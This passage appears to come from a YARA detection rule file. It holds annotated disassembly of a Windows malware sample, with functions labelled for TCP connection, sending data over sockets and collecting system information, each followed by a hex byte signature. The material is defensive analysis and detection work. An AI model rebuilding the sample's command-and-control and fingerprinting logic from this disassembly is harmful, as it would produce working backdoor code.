ecx,dword [0x0040aad4] + .text:0x00401f05 6800010000 push 256 + .text:0x00401f0a 8d542468 lea edx,dword [esp + 104] + .text:0x00401f0e 68a0a74000 push 0x0040a7a0 + .text:0x00401f13 52 push edx + .text:0x00401f14 e847260000 call 0x00404560 ;sub_00404560(0xbfb07fd8,0x0040a7a0,256) + .text:0x00401f19 8d4c2464 lea ecx,dword [esp + 100] + .text:0x00401f1d 8b442410 mov eax,dword [esp + 16] + .text:0x00401f21 50 push eax + .text:0x00401f22 56 push esi + .text:0x00401f23 51 push ecx + .text:0x00401f24 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00401f2a e8c12a0000 call 0x004049f0 ;sub_004049f0(0xbfb07fd8,<0x00401ec9>,<0x00401dba>) + .text:0x00401f2f 8bcb mov ecx,ebx + .text:0x00401f31 8b542410 mov edx,dword [esp + 16] + .text:0x00401f35 52 push edx + .text:0x00401f36 56 push esi + .text:0x00401f37 e8a4000000 call 0x00401fe0 ;sub_00401fe0(0x61616161,<0x00401ec9>,<0x00401dba>) + .text:0x00401f3c 56 push esi + .text:0x00401f3d e89e5e0000 call 0x00407de0 ;msvcrt.??3@YAXPAX@Z(<0x00401ec9>) + .text:0x00401f42 83c404 add esp,4 + .text:0x00401f45 eb1c jmp 0x00401f63 + .text:0x00401f47 loc_00401f47: [1 XREFS] + .text:0x00401f47 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401f49 8d4c243c lea ecx,dword [esp + 60] + .text:0x00401f4d e88ef5ffff call 0x004014e0 ;sub_004014e0(arg0) + .text:0x00401f52 6a00 push 0 + .text:0x00401f54 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401f56 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00401f5a e881f5ffff call 0x004014e0 ;sub_004014e0(local36) + .text:0x00401f5f 6a00 push 0 + .text:0x00401f61 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401f63 loc_00401f63: [4 XREFS] + .text:0x00401f63 8bcb mov ecx,ebx + .text:0x00401f65 e866000000 call 0x00401fd0 ;sub_00401fd0(0x61616161) + .text:0x00401f6a 84c0 test al,al + .text:0x00401f6c 0f85defdffff jnz 0x00401d50 + .text:0x00401f72 eb09 jmp 0x00401f7d + .text:0x00401f74 loc_00401f74: [1 XREFS] + .text:0x00401f74 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401f76 loc_00401f76: [1 XREFS] + .text:0x00401f76 8bcb mov ecx,ebx + .text:0x00401f78 e833020000 call 0x004021b0 ;sub_004021b0(0x61616161) + .text:0x00401f7d loc_00401f7d: [2 XREFS] + .text:0x00401f7d 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00401f81 c684247423000000 mov byte [esp + 9076],0 + .text:0x00401f89 e8c2f0ffff call 0x00401050 ;sub_00401050(local8) + .text:0x00401f8e 8d4c243c lea ecx,dword [esp + 60] + .text:0x00401f92 c7842474230000ff mov dword [esp + 9076],0xffffffff + .text:0x00401f9d e8aef0ffff call 0x00401050 ;sub_00401050(0xbfb07fd0) + .text:0x00401fa2 8b8c246c230000 mov ecx,dword [esp + 9068] + .text:0x00401fa9 5f pop edi + .text:0x00401faa 5e pop esi + .text:0x00401fab 5d pop ebp + .text:0x00401fac 83c8ff or eax,0xffffffff + .text:0x00401faf 5b pop ebx + .text:0x00401fb0 64890d00000000 fs: mov dword [0x00000000],ecx + .text:0x00401fb7 81c468230000 add esp,0x00002368 + .text:0x00401fbd c20400 ret 4 + */ + $c22 = { 6A FF 64 A1 ?? ?? ?? ?? 68 B6 83 40 00 50 B8 5C 23 00 00 64 89 25 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 55 8B 2D ?? ?? ?? ?? 56 57 6A 00 FF D5 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? C7 84 24 ?? ?? ?? ?? 00 00 00 00 E8 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 01 8B CB C7 84 24 ?? ?? ?? ?? 01 00 00 00 8B 83 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? B9 41 00 00 00 8D B4 24 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 6A 00 F3 A5 FF D5 6A 00 6A 00 8D 8C 24 ?? ?? ?? ?? 6A 00 51 6A 00 FF 15 ?? ?? ?? ?? 83 F8 FF 0F 84 ?? ?? ?? ?? 85 C0 0F 8E ?? ?? ?? ?? B9 00 08 00 00 33 C0 8D BC 24 ?? ?? ?? ?? 6A 01 F3 AB FF D5 8B 83 ?? ?? ?? ?? 6A 00 8D 94 24 ?? ?? ?? ?? 68 00 20 00 00 52 50 FF 15 ?? ?? ?? ?? 8B F0 6A 00 85 F6 0F 8E ?? ?? ?? ?? FF D5 8D 8C 24 ?? ?? ?? ?? 56 51 8D 4C 24 ?? E8 ?? ?? ?? ?? B9 3F 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 F3 AB 8B 0D ?? ?? ?? ?? 68 00 01 00 00 66 AB 8D 54 24 ?? 68 A0 A7 40 00 52 AA E8 ?? ?? ?? ?? 6A 00 FF D5 83 FE 09 7C ?? 8D 84 24 ?? ?? ?? ?? 6A 09 8D 4C 24 ?? 50 51 EB ?? 8D 94 24 ?? ?? ?? ?? 56 8D 44 24 ?? 52 50 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 FF D5 8D 8C 24 ?? ?? ?? ?? 56 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 6A 00 C7 44 24 ?? 00 00 00 00 FF D5 6A 04 6A 05 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 50 52 E8 ?? ?? ?? ?? 83 C4 0C 6A 00 FF D5 6A 00 8D 4C 24 ?? BF 94 A5 40 00 E8 ?? ?? ?? ?? 8B F0 B9 05 00 00 00 33 C0 F3 A6 50 0F 85 ?? ?? ?? ?? FF D5 8B 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 3B C1 0F 82 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 04 8B F0 51 6A 00 8D 4C 24 ?? E8 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 83 C4 0C 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 00 01 00 00 8D 54 24 ?? 68 A0 A7 40 00 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 8B 44 24 ?? 50 56 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CB 8B 54 24 ?? 52 56 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 04 EB ?? FF D5 8D 4C 24 ?? E8 ?? ?? ?? ?? 6A 00 FF D5 8D 4C 24 ?? E8 ?? ?? ?? ?? 6A 00 FF D5 8B CB E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? EB ?? FF D5 8B CB E8 ?? ?? ?? ?? 8D 4C 24 ?? C6 84 24 ?? ?? ?? ?? 00 E8 ?? ?? ?? ?? 8D 4C 24 ?? C7 84 24 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 83 C8 FF 5B 64 89 0D ?? ?? ?? ?? 81 C4 68 23 00 00 C2 04 00 } + /* +function at 0x00402310@9324d1a8ae37a36ae560c37448c9705a with 2 features: + - send data + - send data on socket + .text:0x00402310 + .text:0x00402310 FUNC: int thiscall_caller sub_00402310( void * ecx, int arg1, int arg2, int arg3, ) [2 XREFS] + .text:0x00402310 + .text:0x00402310 Stack Variables: (offset from initial top of stack) + .text:0x00402310 12: int arg3 + .text:0x00402310 8: int arg2 + .text:0x00402310 4: int arg1 + .text:0x00402310 -255: int local255 + .text:0x00402310 -256: int local256 + .text:0x00402310 -260: int local260 + .text:0x00402310 -264: int local264 + .text:0x00402310 + .text:0x00402310 81ec08010000 sub esp,264 + .text:0x00402316 53 push ebx + .text:0x00402317 55 push ebp + .text:0x00402318 56 push esi + .text:0x00402319 8be9 mov ebp,ecx + .text:0x0040231b 57 push edi + .text:0x0040231c b93f000000 mov ecx,63 + .text:0x00402321 33c0 xor eax,eax + .text:0x00402323 8d7c2419 lea edi,dword [esp + 25] + .text:0x00402327 c644241800 mov byte [esp + 24],0 + .text:0x0040232c 6800010000 push 256 + .text:0x00402331 f3ab rep: stosd + .text:0x00402333 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00402339 68a0a74000 push 0x0040a7a0 + .text:0x0040233e 66ab stosd + .text:0x00402340 aa stosb + .text:0x00402341 8d442420 lea eax,dword [esp + 32] + .text:0x00402345 c744241800000000 mov dword [esp + 24],0 + .text:0x0040234d 50 push eax + .text:0x0040234e e80d220000 call 0x00404560 ;sub_00404560(local256,0x0040a7a0,256) + .text:0x00402353 8b9c2420010000 mov ebx,dword [esp + 288] + .text:0x0040235a 8bbc241c010000 mov edi,dword [esp + 284] + .text:0x00402361 53 push ebx + .text:0x00402362 8d4c241c lea ecx,dword [esp + 28] + .text:0x00402366 57 push edi + .text:0x00402367 51 push ecx + .text:0x00402368 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x0040236e e87d260000 call 0x004049f0 ;sub_004049f0(local256,arg1,arg2) + .text:0x00402373 8bb42424010000 mov esi,dword [esp + 292] + .text:0x0040237a 8bc3 mov eax,ebx + .text:0x0040237c 3bc6 cmp eax,esi + .text:0x0040237e 724c jc 0x004023cc + .text:0x00402380 loc_00402380: [1 XREFS] + .text:0x00402380 c744241400000000 mov dword [esp + 20],0 + .text:0x00402388 loc_00402388: [1 XREFS] + .text:0x00402388 8b95a8000000 mov edx,dword [ebp + 168] + .text:0x0040238e 6a00 push 0 + .text:0x00402390 56 push esi + .text:0x00402391 57 push edi + .text:0x00402392 52 push edx + .text:0x00402393 ff1514924000 call dword [0x00409214] ;ws2_32.send(0x61616161,arg1,arg3,0) + .text:0x00402399 85c0 test eax,eax + .text:0x0040239b 7f0e jg 0x004023ab + .text:0x0040239d 8b4c2414 mov ecx,dword [esp + 20] + .text:0x004023a1 41 inc ecx + .text:0x004023a2 83f90f cmp ecx,15 + .text:0x004023a5 894c2414 mov dword [esp + 20],ecx + .text:0x004023a9 7cdd jl 0x00402388 + .text:0x004023ab loc_004023ab: [1 XREFS] + .text:0x004023ab 837c24140f cmp dword [esp + 20],15 + .text:0x004023b0 7464 jz 0x00402416 + .text:0x004023b2 8b4c2410 mov ecx,dword [esp + 16] + .text:0x004023b6 6a0a push 10 + .text:0x004023b8 03c8 add ecx,eax + .text:0x004023ba 03fe add edi,esi + .text:0x004023bc 894c2414 mov dword [esp + 20],ecx + .text:0x004023c0 ff1578904000 call dword [0x00409078] ;kernel32.Sleep(10) + .text:0x004023c6 2bde sub ebx,esi + .text:0x004023c8 3bde cmp ebx,esi + .text:0x004023ca 73b4 jnc 0x00402380 + .text:0x004023cc loc_004023cc: [1 XREFS] + .text:0x004023cc 85db test ebx,ebx + .text:0x004023ce 762a jbe 0x004023fa + .text:0x004023d0 33f6 xor esi,esi + .text:0x004023d2 loc_004023d2: [1 XREFS] + .text:0x004023d2 8b85a8000000 mov eax,dword [ebp + 168] + .text:0x004023d8 6a00 push 0 + .text:0x004023da 53 push ebx + .text:0x004023db 57 push edi + .text:0x004023dc 50 push eax + .text:0x004023dd ff1514924000 call dword [0x00409214] ;ws2_32.send(0x61616161,arg1,arg2,0) + .text:0x004023e3 85c0 test eax,eax + .text:0x004023e5 7f06 jg 0x004023ed + .text:0x004023e7 46 inc esi + .text:0x004023e8 83fe0f cmp esi,15 + .text:0x004023eb 7ce5 jl 0x004023d2 + .text:0x004023ed loc_004023ed: [1 XREFS] + .text:0x004023ed 83fe0f cmp esi,15 + .text:0x004023f0 7424 jz 0x00402416 + .text:0x004023f2 8b4c2410 mov ecx,dword [esp + 16] + .text:0x004023f6 03c8 add ecx,eax + .text:0x004023f8 eb04 jmp 0x004023fe + .text:0x004023fa loc_004023fa: [1 XREFS] + .text:0x004023fa 8b4c2410 mov ecx,dword [esp + 16] + .text:0x004023fe loc_004023fe: [1 XREFS] + .text:0x004023fe 3b8c2420010000 cmp ecx,dword [esp + 288] + .text:0x00402405 750f jnz 0x00402416 + .text:0x00402407 5f pop edi + .text:0x00402408 5e pop esi + .text:0x00402409 5d pop ebp + .text:0x0040240a 8bc1 mov eax,ecx + .text:0x0040240c 5b pop ebx + .text:0x0040240d 81c408010000 add esp,264 + .text:0x00402413 c20c00 ret 12 + .text:0x00402416 loc_00402416: [3 XREFS] + .text:0x00402416 5f pop edi + .text:0x00402417 5e pop esi + .text:0x00402418 5d pop ebp + .text:0x00402419 83c8ff or eax,0xffffffff + .text:0x0040241c 5b pop ebx + .text:0x0040241d 81c408010000 add esp,264 + .text:0x00402423 c20c00 ret 12 + */ + $c23 = { 81 EC 08 01 00 00 53 55 56 8B E9 57 B9 3F 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 68 00 01 00 00 F3 AB 8B 0D ?? ?? ?? ?? 68 A0 A7 40 00 66 AB AA 8D 44 24 ?? C7 44 24 ?? 00 00 00 00 50 E8 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 8B BC 24 ?? ?? ?? ?? 53 8D 4C 24 ?? 57 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 8B C3 3B C6 72 ?? C7 44 24 ?? 00 00 00 00 8B 95 ?? ?? ?? ?? 6A 00 56 57 52 FF 15 ?? ?? ?? ?? 85 C0 7F ?? 8B 4C 24 ?? 41 83 F9 0F 89 4C 24 ?? 7C ?? 83 7C 24 ?? 0F 74 ?? 8B 4C 24 ?? 6A 0A 03 C8 03 FE 89 4C 24 ?? FF 15 ?? ?? ?? ?? 2B DE 3B DE 73 ?? 85 DB 76 ?? 33 F6 8B 85 ?? ?? ?? ?? 6A 00 53 57 50 FF 15 ?? ?? ?? ?? 85 C0 7F ?? 46 83 FE 0F 7C ?? 83 FE 0F 74 ?? 8B 4C 24 ?? 03 C8 EB ?? 8B 4C 24 ?? 3B 8C 24 ?? ?? ?? ?? 75 ?? 5F 5E 5D 8B C1 5B 81 C4 08 01 00 00 C2 0C 00 5F 5E 5D 83 C8 FF 5B 81 C4 08 01 00 00 C2 0C 00 } + /* +function at 0x00401800@9324d1a8ae37a36ae560c37448c9705a with 4 features: + - act as TCP client + - connect TCP socket + - resolve DNS + - set socket configuration + .text:0x00401800 + .text:0x00401800 FUNC: int thiscall_caller sub_00401800( void * ecx, int arg1, int arg2, ) [4 XREFS] + .text:0x00401800 + .text:0x00401800 Stack Variables: (offset from initial top of stack) + .text:0x00401800 8: int arg2 + .text:0x00401800 4: int arg1 + .text:0x00401800 -12: int local12 + .text:0x00401800 -14: int local14 + .text:0x00401800 -16: int local16 + .text:0x00401800 -24: int local24 + .text:0x00401800 -28: int local28 + .text:0x00401800 -32: int local32 + .text:0x00401800 + .text:0x00401800 83ec1c sub esp,28 + .text:0x00401803 55 push ebp + .text:0x00401804 8b6c2424 mov ebp,dword [esp + 36] + .text:0x00401808 56 push esi + .text:0x00401809 57 push edi + .text:0x0040180a 85ed test ebp,ebp + .text:0x0040180c 8bf1 mov esi,ecx + .text:0x0040180e 750b jnz 0x0040181b + .text:0x00401810 5f pop edi + .text:0x00401811 5e pop esi + .text:0x00401812 33c0 xor eax,eax + .text:0x00401814 5d pop ebp + .text:0x00401815 83c41c add esp,28 + .text:0x00401818 c20800 ret 8 + .text:0x0040181b loc_0040181b: [1 XREFS] + .text:0x0040181b 8b442430 mov eax,dword [esp + 48] + .text:0x0040181f 85c0 test eax,eax + .text:0x00401821 750b jnz 0x0040182e + .text:0x00401823 5f pop edi + .text:0x00401824 5e pop esi + .text:0x00401825 33c0 xor eax,eax + .text:0x00401827 5d pop ebp + .text:0x00401828 83c41c add esp,28 + .text:0x0040182b c20800 ret 8 + .text:0x0040182e loc_0040182e: [1 XREFS] + .text:0x0040182e 8bce mov ecx,esi + .text:0x00401830 e87b090000 call 0x004021b0 ;sub_004021b0(ecx) + .text:0x00401835 8b86ac000000 mov eax,dword [esi + 172] + .text:0x0040183b 50 push eax + .text:0x0040183c ff1590904000 call dword [0x00409090] ;kernel32.ResetEvent(0x61616161) + .text:0x00401842 c686b000000000 mov byte [esi + 176],0 + .text:0x00401849 a19ca54000 mov eax,dword [0x0040a59c] + .text:0x0040184e 85c0 test eax,eax + .text:0x00401850 7415 jz 0x00401867 + .text:0x00401852 83f804 cmp eax,4 + .text:0x00401855 7410 jz 0x00401867 + .text:0x00401857 83f805 cmp eax,5 + .text:0x0040185a 740b jz 0x00401867 + .text:0x0040185c 5f pop edi + .text:0x0040185d 5e pop esi + .text:0x0040185e 33c0 xor eax,eax + .text:0x00401860 5d pop ebp + .text:0x00401861 83c41c add esp,28 + .text:0x00401864 c20800 ret 8 + .text:0x00401867 loc_00401867: [3 XREFS] + .text:0x00401867 6a06 push 6 + .text:0x00401869 6a01 push 1 + .text:0x0040186b 6a02 push 2 + .text:0x0040186d ff1500924000 call dword [0x00409200] ;ws2_32.socket(2,1,6) + .text:0x00401873 83f8ff cmp eax,0xffffffff + .text:0x00401876 8986a8000000 mov dword [esi + 168],eax + .text:0x0040187c 750b jnz 0x00401889 + .text:0x0040187e 5f pop edi + .text:0x0040187f 5e pop esi + .text:0x00401880 33c0 xor eax,eax + .text:0x00401882 5d pop ebp + .text:0x00401883 83c41c add esp,28 + .text:0x00401886 c20800 ret 8 + .text:0x00401889 loc_00401889: [1 XREFS] + .text:0x00401889 55 push ebp + .text:0x0040188a ff15fc914000 call dword [0x004091fc] ;ws2_32.gethostbyname(arg1) + .text:0x00401890 8bf8 mov edi,eax + .text:0x00401892 85ff test edi,edi + .text:0x00401894 7509 jnz 0x0040189f + .text:0x00401896 5f pop edi + .text:0x00401897 5e pop esi + .text:0x00401898 5d pop ebp + .text:0x00401899 83c41c add esp,28 + .text:0x0040189c c20800 ret 8 + .text:0x0040189f loc_0040189f: [1 XREFS] + .text:0x0040189f a19ca54000 mov eax,dword [0x0040a59c] + .text:0x004018a4 66c74424180200 mov word [esp + 24],2 + .text:0x004018ab 85c0 test eax,eax + .text:0x004018ad 740a jz 0x004018b9 + .text:0x004018af 668b0d20a04000 mov cx,word [0x0040a020] + .text:0x004018b6 51 push ecx + .text:0x004018b7 eb05 jmp 0x004018be + .text:0x004018b9 loc_004018b9: [1 XREFS] + .text:0x004018b9 8b542430 mov edx,dword [esp + 48] + .text:0x004018bd 52 push edx + .text:0x004018be loc_004018be: [1 XREFS] + .text:0x004018be ff15f8914000 call dword [0x004091f8] ;ws2_32.htons(arg2) + .text:0x004018c4 668944241a mov word [esp + 26],ax + .text:0x004018c9 8b470c mov eax,dword [edi + 12] + .text:0x004018cc 6a10 push 16 + .text:0x004018ce 8b08 mov ecx,dword [eax] + .text:0x004018d0 8d44241c lea eax,dword [esp + 28] + .text:0x004018d4 50 push eax + .text:0x004018d5 8b11 mov edx,dword [ecx] + .text:0x004018d7 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x004018dd 51 push ecx + .text:0x004018de 89542428 mov dword [esp + 40],edx + .text:0x004018e2 ff15f4914000 call dword [0x004091f4] ;ws2_32.connect(0x61616161,local16,16) + .text:0x004018e8 83f8ff cmp eax,0xffffffff + .text:0x004018eb 750b jnz 0x004018f8 + .text:0x004018ed 5f pop edi + .text:0x004018ee 5e pop esi + .text:0x004018ef 33c0 xor eax,eax + .text:0x004018f1 5d pop ebp + .text:0x004018f2 83c41c add esp,28 + .text:0x004018f5 c20800 ret 8 + .text:0x004018f8 loc_004018f8: [1 XREFS] + .text:0x004018f8 833d9ca5400005 cmp dword [0x0040a59c],5 + .text:0x004018ff 751c jnz 0x0040191d + .text:0x00401901 8b542430 mov edx,dword [esp + 48] + .text:0x00401905 8bce mov ecx,esi + .text:0x00401907 52 push edx + .text:0x00401908 55 push ebp + .text:0x00401909 e8b2000000 call 0x004019c0 ;sub_004019c0(arg1,arg2) + .text:0x0040190e 84c0 test al,al + .text:0x00401910 750b jnz 0x0040191d + .text:0x00401912 5f pop edi + .text:0x00401913 5e pop esi + .text:0x00401914 33c0 xor eax,eax + .text:0x00401916 5d pop ebp + .text:0x00401917 83c41c add esp,28 + .text:0x0040191a c20800 ret 8 + .text:0x0040191d loc_0040191d: [2 XREFS] + .text:0x0040191d 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x00401923 8d44242c lea eax,dword [esp + 44] + .text:0x00401927 6a04 push 4 + .text:0x00401929 50 push eax + .text:0x0040192a 6a08 push 8 + .text:0x0040192c 68ffff0000 push 0x0000ffff + .text:0x00401931 51 push ecx + .text:0x00401932 c744244001000000 mov dword [esp + 64],1 + .text:0x0040193a ff152c924000 call dword [0x0040922c] ;ws2_32.setsockopt(0x61616161,0x0000ffff,8,arg1) + .text:0x00401940 85c0 test eax,eax + .text:0x00401942 753a jnz 0x0040197e + .text:0x00401944 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x0040194a 50 push eax + .text:0x0040194b 8d542430 lea edx,dword [esp + 48] + .text:0x0040194f 50 push eax + .text:0x00401950 52 push edx + .text:0x00401951 50 push eax + .text:0x00401952 50 push eax + .text:0x00401953 8d442420 lea eax,dword [esp + 32] + .text:0x00401957 6a0c push 12 + .text:0x00401959 50 push eax + .text:0x0040195a 6804000098 push 0x98000004 + .text:0x0040195f 51 push ecx + .text:0x00401960 c744243001000000 mov dword [esp + 48],1 + .text:0x00401968 c744243460ea0000 mov dword [esp + 52],0x0000ea60 + .text:0x00401970 c744243888130000 mov dword [esp + 56],0x00001388 + .text:0x00401978 ff1520924000 call dword [0x00409220] ;ws2_32.WSAIoctl(0x61616161,0x98000004,local32,12,ws2_32.setsockopt(0x61616161,0x0000ffff,8,arg1),<0x0040193a>,0xbfb07fb0,<0x0040193a>) + .text:0x0040197e loc_0040197e: [1 XREFS] + .text:0x0040197e 6a01 push 1 + .text:0x00401980 6a00 push 0 + .text:0x00401982 6a00 push 0 + .text:0x00401984 56 push esi + .text:0x00401985 68d01c4000 push 0x00401cd0 + .text:0x0040198a 6a00 push 0 + .text:0x0040198c 6a00 push 0 + .text:0x0040198e c686b000000001 mov byte [esi + 176],1 + .text:0x00401995 e8465f0000 call 0x004078e0 ;sub_004078e0(0,0,0x00401cd0,ecx,0,0,1) + .text:0x0040199a 83c41c add esp,28 + .text:0x0040199d 8986a4000000 mov dword [esi + 164],eax + .text:0x004019a3 b801000000 mov eax,1 + .text:0x004019a8 5f pop edi + .text:0x004019a9 5e pop esi + .text:0x004019aa 5d pop ebp + .text:0x004019ab 83c41c add esp,28 + .text:0x004019ae c20800 ret 8 + */ + $c24 = { 83 EC 1C 55 8B 6C 24 ?? 56 57 85 ED 8B F1 75 ?? 5F 5E 33 C0 5D 83 C4 1C C2 08 00 8B 44 24 ?? 85 C0 75 ?? 5F 5E 33 C0 5D 83 C4 1C C2 08 00 8B CE E8 ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? 00 A1 ?? ?? ?? ?? 85 C0 74 ?? 83 F8 04 74 ?? 83 F8 05 74 ?? 5F 5E 33 C0 5D 83 C4 1C C2 08 00 6A 06 6A 01 6A 02 FF 15 ?? ?? ?? ?? 83 F8 FF 89 86 ?? ?? ?? ?? 75 ?? 5F 5E 33 C0 5D 83 C4 1C C2 08 00 55 FF 15 ?? ?? ?? ?? 8B F8 85 FF 75 ?? 5F 5E 5D 83 C4 1C C2 08 00 A1 ?? ?? ?? ?? 66 C7 44 24 ?? 02 00 85 C0 74 ?? 66 8B 0D ?? ?? ?? ?? 51 EB ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 66 89 44 24 ?? 8B 47 ?? 6A 10 8B 08 8D 44 24 ?? 50 8B 11 8B 8E ?? ?? ?? ?? 51 89 54 24 ?? FF 15 ?? ?? ?? ?? 83 F8 FF 75 ?? 5F 5E 33 C0 5D 83 C4 1C C2 08 00 83 3D ?? ?? ?? ?? 05 75 ?? 8B 54 24 ?? 8B CE 52 55 E8 ?? ?? ?? ?? 84 C0 75 ?? 5F 5E 33 C0 5D 83 C4 1C C2 08 00 8B 8E ?? ?? ?? ?? 8D 44 24 ?? 6A 04 50 6A 08 68 FF FF 00 00 51 C7 44 24 ?? 01 00 00 00 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 8E ?? ?? ?? ?? 50 8D 54 24 ?? 50 52 50 50 8D 44 24 ?? 6A 0C 50 68 04 00 00 98 51 C7 44 24 ?? 01 00 00 00 C7 44 24 ?? 60 EA 00 00 C7 44 24 ?? 88 13 00 00 FF 15 ?? ?? ?? ?? 6A 01 6A 00 6A 00 56 68 D0 1C 40 00 6A 00 6A 00 C6 86 ?? ?? ?? ?? 01 E8 ?? ?? ?? ?? 83 C4 1C 89 86 ?? ?? ?? ?? B8 01 00 00 00 5F 5E 5D 83 C4 1C C2 08 00 } + /* +function at 0x004052a0@9324d1a8ae37a36ae560c37448c9705a with 7 features: + - check OS version + - get disk information + - get disk size + - get local IPv4 addresses + - get memory capacity + - get socket information + - get system information on Windows + .text:0x004052a0 + .text:0x004052a0 FUNC: int cdecl sub_004052a0( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x004052a0 + .text:0x004052a0 Stack Variables: (offset from initial top of stack) + .text:0x004052a0 12: int arg2 + .text:0x004052a0 8: int arg1 + .text:0x004052a0 4: int arg0 + .text:0x004052a0 -256: int local256 + .text:0x004052a0 -260: int local260 + .text:0x004052a0 -516: int local516 + .text:0x004052a0 -768: int local768 + .text:0x004052a0 -772: int local772 + .text:0x004052a0 -872: int local872 + .text:0x004052a0 -972: int local972 + .text:0x004052a0 -1072: int local1072 + .text:0x004052a0 -1220: int local1220 + .text:0x004052a0 -1224: int local1224 + .text:0x004052a0 -1228: int local1228 + .text:0x004052a0 -1278: int local1278 + .text:0x004052a0 -1328: int local1328 + .text:0x004052a0 -1378: int local1378 + .text:0x004052a0 -1428: int local1428 + .text:0x004052a0 -1432: int local1432 + .text:0x004052a0 -1436: int local1436 + .text:0x004052a0 -1440: int local1440 + .text:0x004052a0 -1444: int local1444 + .text:0x004052a0 -1496: int local1496 + .text:0x004052a0 -1500: int local1500 + .text:0x004052a0 -1520: int local1520 + .text:0x004052a0 -1524: int local1524 + .text:0x004052a0 -1676: int local1676 + .text:0x004052a0 -1680: int local1680 + .text:0x004052a0 -1684: int local1684 + .text:0x004052a0 -1700: int local1700 + .text:0x004052a0 -1720: int local1720 + .text:0x004052a0 -1772: int local1772 + .text:0x004052a0 -1776: int local1776 + .text:0x004052a0 -1784: int local1784 + .text:0x004052a0 -1792: int local1792 + .text:0x004052a0 -1800: int local1800 + .text:0x004052a0 -1804: int local1804 + .text:0x004052a0 -1808: int local1808 + .text:0x004052a0 -1812: int local1812 + .text:0x004052a0 -1820: int local1820 + .text:0x004052a0 -1824: int local1824 + .text:0x004052a0 -1837: int local1837 + .text:0x004052a0 -1838: int local1838 + .text:0x004052a0 -1839: int local1839 + .text:0x004052a0 -1840: int local1840 + .text:0x004052a0 -1844: int local1844 + .text:0x004052a0 -1845: int local1845 + .text:0x004052a0 -1846: int local1846 + .text:0x004052a0 -1847: int local1847 + .text:0x004052a0 -1848: int local1848 + .text:0x004052a0 -1849: int local1849 + .text:0x004052a0 -1850: int local1850 + .text:0x004052a0 -1851: int local1851 + .text:0x004052a0 -1852: int local1852 + .text:0x004052a0 -1853: int local1853 + .text:0x004052a0 -1854: int local1854 + .text:0x004052a0 -1855: int local1855 + .text:0x004052a0 -1856: int local1856 + .text:0x004052a0 -1860: int local1860 + .text:0x004052a0 -1862: int local1862 + .text:0x004052a0 -1863: int local1863 + .text:0x004052a0 -1864: int local1864 + .text:0x004052a0 + .text:0x004052a0 81ec44070000 sub esp,1860 + .text:0x004052a6 53 push ebx + .text:0x004052a7 55 push ebp + .text:0x004052a8 56 push esi + .text:0x004052a9 8b3578904000 mov esi,dword [0x00409078] + .text:0x004052af 57 push edi + .text:0x004052b0 6a00 push 0 + .text:0x004052b2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004052b4 6a00 push 0 + .text:0x004052b6 c644241825 mov byte [esp + 24],37 + .text:0x004052bb c644241964 mov byte [esp + 25],100 + .text:0x004052c0 c644241a00 mov byte [esp + 26],0 + .text:0x004052c5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004052c7 6a00 push 0 + .text:0x004052c9 c68424c800000066 mov byte [esp + 200],102 + .text:0x004052d1 c78424c001000000 mov dword [esp + 448],0 + .text:0x004052dc ffd6 call esi ;kernel32.Sleep(0) + .text:0x004052de bd9c000000 mov ebp,156 + .text:0x004052e3 6a00 push 0 + .text:0x004052e5 89ac24cc000000 mov dword [esp + 204],ebp + .text:0x004052ec ffd6 call esi ;kernel32.Sleep(0) + .text:0x004052ee 8b842458070000 mov eax,dword [esp + 1880] + .text:0x004052f5 8b1d94904000 mov ebx,dword [0x00409094] + .text:0x004052fb 8d8c2454040000 lea ecx,dword [esp + 1108] + .text:0x00405302 50 push eax + .text:0x00405303 51 push ecx + .text:0x00405304 ffd3 call ebx ;kernel32.lstrcpyA(local768,arg0) + .text:0x00405306 6a00 push 0 + .text:0x00405308 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040530a 8b3d0c914000 mov edi,dword 